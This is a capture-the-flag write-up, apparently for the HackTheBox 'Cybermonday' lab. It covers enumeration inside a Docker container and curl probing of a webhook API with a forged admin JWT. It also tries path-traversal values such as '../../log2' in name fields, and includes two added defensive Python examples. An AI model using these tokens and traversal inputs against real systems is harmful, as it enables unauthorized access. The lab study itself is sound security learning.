Docker Container


It was initially suspected that I had gained a foothold in a Docker container, and this was later confirmed while performing some basic enumeration

www-data@070370e2cdc4:~/html/public$ pwd
/var/www/html/public
www-data@070370e2cdc4:~/html/public$ ll ..
total 404K
8.0k drwxrwxrwt 1 www-data www-data 4.0k jul  3 04:59 .
4.0k -rw-r--r-- 1 www-data www-data 1.1k jun 30 14:35 .env
8.0k drwxr-xr-x 1 root     root     4.0k jun 14 04:37 ..
4.0k -rw-r--r-- 1 www-data www-data 1.8k may 29 21:52 composer.json
4.0k -rw-r--r-- 1 www-data www-data   10 may 29 03:25 .dockerignore
4.0K drwxr-xr-x 1 www-data www-data 4.0K Jan 24  2023 .git
4.0K drwxr-xr-x 1 www-data www-data 4.0K Jan 14  2023 public
4.0K drwxr-xr-x 1 www-data www-data 4.0K Jan 14  2023 resources
284K -rw-r--r-- 1 www-data www-data 282K Jan  6  2023 composer.lock
4.0K drwxr-xr-x 1 www-data www-data 4.0K Jan  6  2023 vendor
4.0K -rw-r--r-- 1 www-data www-data  258 May  5  2022 .editorconfig
4.0K -rw-r--r-- 1 www-data www-data  912 May  5  2022 .env.example
4.0K -rw-r--r-- 1 www-data www-data  152 May  5  2022 .gitattributes
4.0K -rw-r--r-- 1 www-data www-data  179 May  5  2022 .gitignore
4.0K -rw-r--r-- 1 www-data www-data  162 May  5  2022 .styleci.yml
4.0K -rw-r--r-- 1 www-data www-data 3.9K May  5  2022 README.md
4.0K drwxr-xr-x 1 www-data www-data 4.0K May  5  2022 app
4.0K -rwxr-xr-x 1 www-data www-data 1.7K May  5  2022 artisan
4.0K drwxr-xr-x 1 www-data www-data 4.0K May  5  2022 bootstrap
4.0K drwxr-xr-x 1 www-data www-data 4.0K May  5  2022 config
4.0K drwxr-xr-x 1 www-data www-data 4.0K May  5  2022 database
4.0K drwxr-xr-x 1 www-data www-data 4.0K May  5  2022 lang
4.0K -rw-r--r-- 1 www-data www-data  473 May  5  2022 package.json
4.0K -rw-r--r-- 1 www-data www-data 1.2K May  5  2022 phpunit.xml
4.0K drwxr-xr-x 1 www-data www-data 4.0K May  5  2022 routes
8.0K drwxr-xr-x 1 www-data www-data 4.0K May  5  2022 storage
4.0K drwxr-xr-x 1 www-data www-data 4.0K May  5  2022 tests
4.0K -rw-r--r-- 1 www-data www-data  559 May  5  2022 webpack.mix.js

I spawned in the public directory of the web application

www-data@070370e2cdc4:~/html/public$ ll /
total 60K
   0 drwxr-xr-x   5 root root  340 aug 22 15:41 dev
   0 dr-xr-xr-x 259 root root    0 aug 22 15:41 proc
   0 dr-xr-xr-x  13 root root    0 aug 22 15:41 sys
4.0k drwxr-xr-x   5 1000 1000 4.0k aug  3 09:51 mnt
4.0k drwxr-xr-x   1 root root 4.0k jul  3 05:00 .
4.0k drwxr-xr-x   1 root root 4.0k jul  3 05:00 ..
   0 -rwxr-xr-x   1 root root    0 jul  3 05:00 .dockerenv
4.0k drwxr-xr-x   1 root root 4.0k jul  3 05:00 etc
4.0k drwxrwxrwt   1 root root 4.0k jul  3 04:59 tmp
4.0k drwxr-xr-x   1 root root 4.0k jul  3 04:58 run
4.0k drwx------   1 root root 4.0k jun 14 05:52 root
8.0k drwxr-xr-x   1 root root 4.0k jun 14 04:37 var
   0 lrwxrwxrwx   1 root root    7 jun 12 00:00 bin -> usr/bin
   0 lrwxrwxrwx   1 root root    7 jun 12 00:00 lib -> usr/lib
   0 lrwxrwxrwx   1 root root    9 jun 12 00:00 lib32 -> usr/lib32
   0 lrwxrwxrwx   1 root root    9 jun 12 00:00 lib64 -> usr/lib64
   0 lrwxrwxrwx   1 root root   10 jun 12 00:00 libx32 -> usr/libx32
4.0k drwxr-xr-x   2 root root 4.0k jun 12 00:00 media
4.0k drwxr-xr-x   2 root root 4.0k jun 12 00:00 opt
   0 lrwxrwxrwx   1 root root    8 jun 12 00:00 sbin -> usr/sbin
4.0k drwxr-xr-x   2 root root 4.0k jun 12 00:00 srv
4.0k drwxr-xr-x   1 root root 4.0k jun 12 00:00 usr
4.0k drwxr-xr-x   2 root root 4.0k mar  2 13:55 boot
4.0k drwxr-xr-x   2 root root 4.0k mar  2 13:55 home

There is indeed the .dockerenv file at the system root

/mnt


www-data@070370e2cdc4:/$ cd mnt ; ll
total 40K
4.0K -rw-r----- 1 root 1000   33 Aug 22 15:41 user.txt
4.0K drwxr-xr-x 2 1000 1000 4.0K Aug  3 09:51 .ssh
4.0K drwxrwxrwx 2 root root 4.0K Aug  3 09:51 logs
4.0K drwxr-xr-x 5 1000 1000 4.0K Aug  3 09:51 .
4.0K drwxr-xr-x 3 1000 1000 4.0K Aug  3 09:51 .local
4.0K drwxr-xr-x 1 root root 4.0K Jul  3 05:00 ..
   0 lrwxrwxrwx 1 root root    9 Jun  4 02:07 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 root root  701 May 29 23:26 changelog.txt
4.0K -rw-r--r-- 1 1000 1000  220 May 29 15:12 .bash_logout
4.0K -rw-r--r-- 1 1000 1000 3.5K May 29 15:12 .bashrc
4.0K -rw-r--r-- 1 1000 1000  807 May 29 15:12 .profile

Interestingly, the home directory of somebody in the host system appears to be mounted to the /mnt directory

changelog.txt


www-data@070370e2cdc4:/mnt$ cat changelog.txt
All notable changes to this project will be documented in this file.
 
the format is based on [keep a changelog](https://keepachangelog.com/en/1.0.0/),
and this project adheres to [semantic versioning](https://semver.org/spec/v2.0.0.html).
 
## [Unreleased]
 
### Added
 
- Added Home Page
- added [webhook](http://webhooks-api-beta.cybermonday.htb/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77) (beta) for create registration logs
 
### Fixed
 
- Fixed SQLi in Login Page
 
## [1.1.0] - 2022-12-28
 
### Added
 
- Added page to create products.
- Added Welcome Page.
 
### Changed
 
- Changelog Theme
 
## [1.0.0] - 2022-06-20
 
### Added
 
- Added Dashboard.
- Added Changelog Page.
 
### Removed
 
- Contact Page.

The changelog.txt file has content identical to what I saw in the /dashboard page of the web app

.ssh


www-data@070370e2cdc4:/mnt$ ll .ssh
total 12K
4.0K drwxr-xr-x 2 1000 1000 4.0K Aug  3 09:51 .
4.0K drwxr-xr-x 5 1000 1000 4.0K Aug  3 09:51 ..
4.0K -rw-r--r-- 1 root root  742 Jun 30 15:50 authorized_keys
www-data@070370e2cdc4:/mnt$ cat .ssh/authorized_keys
ssh-rsa [public key omitted] john@cybermonday

The .ssh directory has the authorized_keys file that contains the public key of the john user

logs


www-data@070370e2cdc4:/mnt$ ll logs
total 8.0K
4.0k drwxrwxrwx 2 root root 4.0k aug  3 09:51 .
4.0k drwxr-xr-x 5 1000 1000 4.0k aug  3 09:51 ..

Although it’s empty, this directory is interesting because I can write to the directory according to the permission bits (drwxrwxrwx)

www-data@070370e2cdc4:/mnt$ echo adsfjajsdf > logs/blah.txt
bash: logs/blah.txt: Read-only file system

However, I cannot do so likely due to the privilege override from the container configuration
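Mode bits of drwxrwxrwx together with a "Read-only file system" error (EROFS) is what a mount flagged ro produces, and /proc/self/mountinfo shows that flag per mount. The parser below is an added example, not part of the original notes; the sample mountinfo lines, including the /home/hostuser source path, are constructed, not taken from the target.

```python
import os

# Constructed sample in /proc/self/mountinfo format (see proc(5)); not from the target.
SAMPLE_MOUNTINFO = """\
620 501 0:52 / / rw,relatime master:180 - overlay overlay rw,lowerdir=/l,upperdir=/u,workdir=/w
621 620 0:55 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
640 620 8:1 /home/hostuser /mnt ro,relatime - ext4 /dev/sda1 rw,errors=remount-ro
"""

def parse_mountinfo(text):
    """Return one dict per mount: source root, mount point, per-mount options, fs type."""
    mounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        left, right = line.split(" - ", 1)   # " - " ends the variable-length optional fields
        fields = left.split()
        mounts.append({
            "root": fields[3],                    # path inside the source filesystem
            "mount_point": fields[4],             # where it appears in this namespace
            "options": set(fields[5].split(",")), # per-mount flags such as ro / rw
            "fstype": right.split()[0],
        })
    return mounts

def mount_for(path, mounts):
    """Pick the mount with the longest mount point that contains path."""
    path = os.path.normpath(path)
    best = None
    for m in mounts:
        mp = m["mount_point"]
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            if best is None or len(mp) > len(best["mount_point"]):
                best = m
    return best

def is_read_only(path, mounts):
    """True when the mount that holds path carries the ro flag."""
    m = mount_for(path, mounts)
    return m is not None and "ro" in m["options"]

if __name__ == "__main__":
    source = "/proc/self/mountinfo"
    text = open(source).read() if os.path.exists(source) else SAMPLE_MOUNTINFO
    for m in parse_mountinfo(text):
        flag = "ro" if "ro" in m["options"] else "rw"
        print(f'{flag}  {m["fstype"]:8} {m["root"]} -> {m["mount_point"]}')
```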

But this reminds me of the recently added content in the changelog.txt file

There was an existing webhook supposedly designed for creating logs

┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl http://webhooks-api-beta.cybermonday.htb/webhooks -H "x-access-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE"
{"status":"success","message":[{"id":1,"uuid":"fda96d32-e8c8-4301-8fb3-c821a316cf77","name":"tests","description":"webhook for tests","action":"createLogFile"},{"id":2,"uuid":"8de9df58-7220-4e7a-81d3-d7faa469f157","name":"SSRF","description":"testing","action":"sendRequest"}]}                                                                                                                               

This can be confirmed by sending a GET request to the /webhooks API endpoint

fda96d32-e8c8-4301-8fb3-c821a316cf77 is the uuid of the log webhook

I will try that

webhook


┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77 -H "x-access-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE" -H "Content-Type: application/json"  -d '{"action": "dfdf", "url": "http://10.10.14.20","method": "GET"}'       
{"status":"error","message":"\"log_name\" not defined"}                                                                                                                               
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77 -H "x-access-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE" -H "Content-Type: application/json"  -d '{"log_name": "log1", "log": "http://10.10.14.20","method": "GET"}'
{"status":"error","message":"\"log_content\" not defined"}

It seems that log_name and log_content are required parameters

┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77 -H "x-access-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE" -H "Content-Type: application/json"  -d '{"log_name": "log1", "log_content": "hello world"}'                       
{"status":"success","message":"Log created"}

Log created

www-data@070370e2cdc4:/mnt$ ll logs
total 12K
4.0K drwxrwxrwx 3 root root 4.0K Aug 22 17:31 .
4.0K drwxr-xr-x 2 root root 4.0K Aug 22 17:31 tests
4.0K drwxr-xr-x 5 1000 1000 4.0K Aug  3 09:51 ..
www-data@070370e2cdc4:/mnt$ ll logs/tests
total 12K
4.0K drwxr-xr-x 2 root root 4.0K Aug 22 17:31 .
4.0K drwxrwxrwx 3 root root 4.0K Aug 22 17:31 ..
4.0K -rw-r--r-- 1 root root   12 Aug 22 17:31 log1-1692725460.log
www-data@070370e2cdc4:/mnt$ cat logs/tests/log1-1692725460.log
hello world

It generated the logs/tests/log1-1692725460.log file, which contains the value of the log_content parameter that I placed above

The file name seems to be the value of the log_name parameter with the - character followed by the Unix timestamp

The directory seems to correspond to the webhook name itself; tests

┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77 -H "x-access-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE" -H "Content-Type: application/json"  -d '{"log_name": "../../log2", "log_content": "hello world"}'
{"status":"error","message":"Only letters and numbers are allowed in the \"name\""}                                                                                                                               

I tried the basic path traversal technique, and it didn’t work

The error message, however, seems to indicate that the path traversal technique worked until it reached the parent directory, which is the name parameter

┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/create -H "x-access-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE" -H "Content-Type: application/json"  -d '{"name": "../dummyDir", "action": "createLogFile","description": "for testing only"}'
{"status":"error","message":"Only letters, numbers and underscores are allowed in the \"name\"","status_code":400}                                                                                                                               
 
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/create -H "x-access-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE" -H "Content-Type: application/json"  -d '{"name": "dummyDir", "action": "createLogFile","description": "for testing only"}' 
{"status":"success","message":"Done! Send me a request to execute the action, as the event listener is still being developed.","webhook_uuid":"265cd169-f359-4f32-ae3e-1576216033b4"}
 
www-data@070370e2cdc4:/mnt$ ll logs
total 16K
4.0K drwxrwxrwx 4 root root 4.0K Aug 22 17:52 .
4.0K drwxr-xr-x 2 root root 4.0K Aug 22 17:52 dummyDir
4.0K drwxr-xr-x 2 root root 4.0K Aug 22 17:31 tests
4.0K drwxr-xr-x 5 1000 1000 4.0K Aug  3 09:51 ..

I also created another webhook for createLogFile

The interesting thing is that the error message is different when I directly place ../ in the name parameter
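From the defender's side, a createLogFile handler that writes logs/<webhook name>/<log_name>-<timestamp>.log needs an allowlist on both names and a containment check on the resolved path. The sketch below is an added example, not the target API's code; the function names, length limits and exact patterns are assumptions modelled on the two error messages above.

```python
import os
import re
import time

# Allowlists modelled on the two error messages above (assumed, not the API's code).
WEBHOOK_NAME_RE = re.compile(r"[A-Za-z0-9_]{1,64}")  # letters, numbers, underscores
LOG_NAME_RE = re.compile(r"[A-Za-z0-9]{1,64}")       # letters and numbers only

class InvalidName(ValueError):
    pass

def build_log_path(base_dir, webhook_name, log_name, now=None):
    """Return base_dir/<webhook_name>/<log_name>-<unix time>.log or raise InvalidName."""
    # fullmatch, not match/search: a trailing newline or a partial match must fail.
    if not isinstance(webhook_name, str) or not WEBHOOK_NAME_RE.fullmatch(webhook_name):
        raise InvalidName("webhook name")
    if not isinstance(log_name, str) or not LOG_NAME_RE.fullmatch(log_name):
        raise InvalidName("log_name")
    ts = int(time.time() if now is None else now)
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, webhook_name, f"{log_name}-{ts}.log"))
    # Second, independent check: resolve symlinks and confirm containment.
    if os.path.commonpath([base, candidate]) != base:
        raise InvalidName("path escapes log directory")
    return candidate

def write_log(base_dir, webhook_name, log_name, content, now=None):
    """Create the log file exclusively and return its path."""
    path = build_log_path(base_dir, webhook_name, log_name, now)
    os.makedirs(os.path.dirname(path), mode=0o750, exist_ok=True)
    # O_EXCL + O_NOFOLLOW: never overwrite and never write through a symlink.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o640)
    with os.fdopen(fd, "w") as fh:
        fh.write(content)
    return path
```

Validating each name separately, as the API appears to do, is the first layer; the realpath containment check catches a symlinked webhook directory that the name patterns alone would not.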